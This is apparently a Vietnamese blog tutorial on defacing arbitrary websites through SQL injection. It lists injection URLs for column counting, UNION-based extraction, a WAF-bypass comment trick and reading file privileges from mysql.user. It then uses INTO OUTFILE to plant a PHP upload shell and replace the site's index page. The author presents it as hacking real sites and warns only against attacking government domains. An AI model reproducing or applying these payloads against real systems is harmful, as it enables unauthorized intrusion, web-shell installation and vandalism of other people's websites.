Hack giao diện website bằng kĩ thuật SQL injection

Hack giao diện website bằng kĩ thuật SQL injection

 SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp. SQL injection có thể cho phép những kẻ tấn công thực hiện các thao tác, delete, insert, update, v.v. trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy. SQL injection thường được biết đến như là một vật trung gian tấn công trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL ServerMySQLOracleDB2Sysbase...


Hack giao diện website bằng kĩ thuật SQL injection


 
Dưới đây là demo nhẹ vài trang web mình hack.


Bước chuẩn bị


> Công cụ hackbar của trình duyệt firefox ( các thứ này có thể lên youtube hoặc google tải về )
> Shell.php :  ( Dowload Shell ) chọn 1 trong 3 tải về cái nài cũng được <3
> Index.html : Cái này lên google gõ lấy trên mạng rồi về edit lại là được !


Các bước thực hiện


• Bước 
: Ta tìm đến đường link của 1 trang web bất kì có id = 123 gì đó, vì thường những thành phần như vầy rất dễ bị injection.

Sau 1 hồi tìm ta có được:

xyz. com/latestArticle.php?id=5 ( như hình ảnh đây chỉ là demo )

- Khởi đầu của sql injection luôn là dấu ' do đó mình thử:

xyz. com/latestArticle.php?id=5'

Kế tiếp ta tìm số cột dùng order by

xyz. com/latestArticle.php?id=5' order by 10-- -

Mặc dù là order by 1 nhưng vẫn bị dính lỗi. Vậy là có vấn đề.

Đầu tiên mình bỏ thử dấu ' xem kết quả,

xyz. com/latestArticle.php?id=5 order by 10-- -

và thông báo lỗi đã hết, ta lại tiếp tục tìm số cột.

Sau 1 hồi mò thì đến cột số28 báo lỗi, còn 27 thì không. Vậy suy ra số cột ta cần tìm là 27

xyz. com/latestArticle.php?id=5 order by 27--


Hack giao diện website bằng kĩ thuật SQL injection



• Bước 2 : Sau khi đã có số cột, ta dùng UNION để kết hợp các kết quả của lệnh select

xyz. com/latestArticle.php?id=5 +UNION_ALL+SELECT+1,2,3,4,5,6,7,..........27-- -

Không thấy xuất hiện kết quả, mình thử - vào sau id.

xyz. com/latestArticle.php?id=-5 +UNION_ALL+SELECT+1,2,3,4,5,6,7,..........27-- -

Hack giao diện website bằng kĩ thuật SQL injection



• Bước 3 : - Tới đây nếu load không được ta chọn WAF BYPASS -> /*!50000UNION*/ thay vào chổ UNION. rồi load xem

- Và kết quả tìm được là 7 như trong hình dưới

Hack giao diện website bằng kĩ thuật SQL injection



Bước 4 : Sau bước tìm được số 7, ta thay số 7 thành user() và load trang như hình dưới :

Hack giao diện website bằng kĩ thuật SQL injection



• Bước 5 : Tiếp đến ta thay user() thành database() rồi load trang : 


Hack giao diện website bằng kĩ thuật SQL injection



• Bước 6 : Bước này , bạn thay database() thành file_priv và thêm +from+mysql.user sau số 27 như hình dưới : 

Hack giao diện website bằng kĩ thuật SQL injection



• Bước 7: Tiếp đến ta bôi đen file_priv chọn UOT FILE->PHP SCRIPT->UPLOADER SCRIPT ... tất cả như hình : 

Hack giao diện website bằng kĩ thuật SQL injection



• Bước 8 : Tiếp đến ta thay +from+mysql.user thành +INTO+OUTFILE+'nơi lưu file shell php'-- -

Hack giao diện website bằng kĩ thuật SQL injection



• Bước 10 : Bước này ta coppy trang web và thêm sau nó /fileshell.php ở bước trước .

ví dụ file shell có tên là : b4ncl0v3r.php thì bạn thêm sau đuôi web nó là /b4ncl0v3r.php...

Hack giao diện website bằng kĩ thuật SQL injection



và  cuối cùng up index.html của các bạn lên ..và xong!!

chúng ta cần thêm /index.html lên link web đó . 

Hack giao diện website bằng kĩ thuật SQL injection

VẬY LÀ CHÚNG TA ĐÃ TẤN CÔNG 1 TRANG WEB ..


Lời kết

Không lạm dụng quá mức nhé, đừng tấn công nhầm các trang web chính phủ GOV, kẻo là bị bốc lịch đấy. Trên đây là thủ thuật hack giao diện website bằng kĩ thuật SQL injection. Chúc các bạn thành công. Xin chào và hẹn gặp lại !

Copyright © Nguyễn Duy Bản 
See Also :